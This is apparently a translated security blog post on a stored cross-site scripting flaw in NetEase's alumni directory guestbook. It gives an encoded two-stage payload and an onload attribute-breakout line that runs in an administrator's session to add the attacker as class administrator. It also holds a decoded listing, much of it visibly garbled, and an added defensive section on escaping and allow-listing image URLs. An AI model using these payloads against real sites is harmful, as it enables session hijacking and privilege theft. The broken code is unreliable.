1. Method:
The message (guestbook) feature of NetEase's alumni directory (同学录) has a cross-site scripting flaw. Here is a way to use it to add yourself as a class administrator.
Fill in the message box:
+++try%20%7B%0D%0A%09var%20as%20%3D%%28%22a%22%29%3B%0D%0A%09var%20frm%20%3D%%28%22iframe%22%29%5B0%5D%3B%0D%0A%%20%3D%20function%28%29%20%7B%0D%0A%09%09var%20oFrm%20%3D%%28%22iframe%22%29%5B0%5D%3B%0D%0A%09%%20%3D%20%22%22%3B%0D%0A%09%09var%20oDoc%20%3D%%3B%0D%0A%09%%5B%22who%22%5D%5B1%%20%3D%20true%3B%0D%0A%09%%20%3D%20%22backaction/%3Ff%3D1%22%3B%0D%0A%09%%28%29%3B%0D%0A%09%7D%0D%0A%%20%3D%20as%5B34%%3B%0D%0A%7D%20catch%20%28e%29%20%7B%0D%0A%09alert%28e%29%3B%0D%0A%7D---
Fill in the input box of the sticker url in the message:
http://alumniimg./new/images/classhome_logo.gif" onload="var t=;var s=('+++')+3;var e=('---');eval(unescape((s,e)));">
When an administrator views the class message board, the script runs in his session and adds me as an administrator.
2. Principle:
The part of the message between +++ and --- is URL-decoded, which gives:
try {
var as = ("a");
var frm = ("iframe")[0];
= function() {
var oFrm = ("iframe")[0];
= "";
var oDoc = ;
["who"][1].checked = true;
= "backaction/?f=1";
();
}
= as[34].href;
} catch (e) {
alert(e);
}
The vulnerability is that the input box for the sticker (image) URL does not filter its value. I post an image and append an onload event to it; as long as the image URL is valid, the image loads normally and that triggers the event, executing the code in my onload. The onload code then searches the page for my message, decodes the text between the markers, and executes it. Because the length of the image URL is limited, I used one jump and split what I wanted to do into two steps.
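Added example, not code from the original post: the root cause described above is that a user-supplied image URL is concatenated straight into an HTML attribute, so a double quote in the value closes the src attribute and the rest of the value becomes new attributes. The block below shows that unsafe rendering next to a hardened version that parses the URL, allow-lists the scheme and host (the host name is a hypothetical placeholder, an assumption for the example), and attribute-encodes the result. The sample input is constructed in the shape of the payload above. Once the attribute breakout is closed, the two-stage trick of fetching a longer payload from the message body has nothing to start from.

```javascript
// Unsafe: raw string concatenation. A value containing a double quote closes
// the src attribute and lets the rest of the value become new attributes
// (for example onload="..."), which is exactly the breakout in the post.
function renderImageUnsafe(url) {
  return '<img src="' + url + '">';
}

// Encode the characters that matter inside a double-quoted HTML attribute.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Allow-list for the sticker feature: hypothetical host name (assumption),
// standing in for whatever image host the site actually serves from.
const ALLOWED_IMAGE_HOSTS = new Set(['img.example.invalid']);

// Returns a normalised absolute URL, or null if the value should be rejected.
function validateImageUrl(url) {
  let parsed;
  try {
    parsed = new URL(String(url));
  } catch (e) {
    return null; // not a parseable absolute URL
  }
  // Only http(s); this also rejects javascript:, data:, vbscript: and friends.
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return null;
  if (!ALLOWED_IMAGE_HOSTS.has(parsed.hostname)) return null;
  return parsed.href;
}

// Hardened: reject anything that fails validation instead of trying to "fix"
// it, and encode what is accepted before placing it in the attribute.
function renderImageSafe(url) {
  const clean = validateImageUrl(url);
  if (clean === null) return '';
  return '<img src="' + escapeAttr(clean) + '">';
}

// Constructed sample input modelled on the payload in the post: a valid image
// URL followed by a quote that closes src and adds an onload handler.
const SAMPLE_PAYLOAD = 'http://img.example.invalid/logo.gif" onload="alert(1)';

// Count the double quotes in rendered markup; a correctly rendered <img> tag
// has exactly two, the ones delimiting the src attribute.
function countQuotes(markup) {
  return (markup.match(/"/g) || []).length;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe :', renderImageUnsafe(SAMPLE_PAYLOAD));
  console.log('safe   :', renderImageSafe(SAMPLE_PAYLOAD));
  console.log('js url :', JSON.stringify(renderImageSafe('javascript:alert(1)')));
}
```

The safe version relies on two independent layers: the URL parser percent-encodes or rejects characters that do not belong in a URL, and escapeAttr guarantees that whatever survives cannot terminate the attribute. Either layer alone would have stopped the breakout here, but keeping both means a parser quirk in one does not reopen the hole.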
3. Finally:
Why post something with so little technical content? Mainly because I find it funny. Doesn't this exploitation process feel the same as an overflow that jumps to execute shellcode? Because of the length limit, the shellcode has to be split into several parts, and the first part jumps to the second to get around the limit; the principles behind vulnerabilities are all similar. Cross-site exploitation can be just as interesting: reusing the page's existing HTML and JS context, hiding the payload, transforming the script, getting around length limits, cross-site worms, and so on. I offer these rough ideas in the hope of drawing out better ones from others.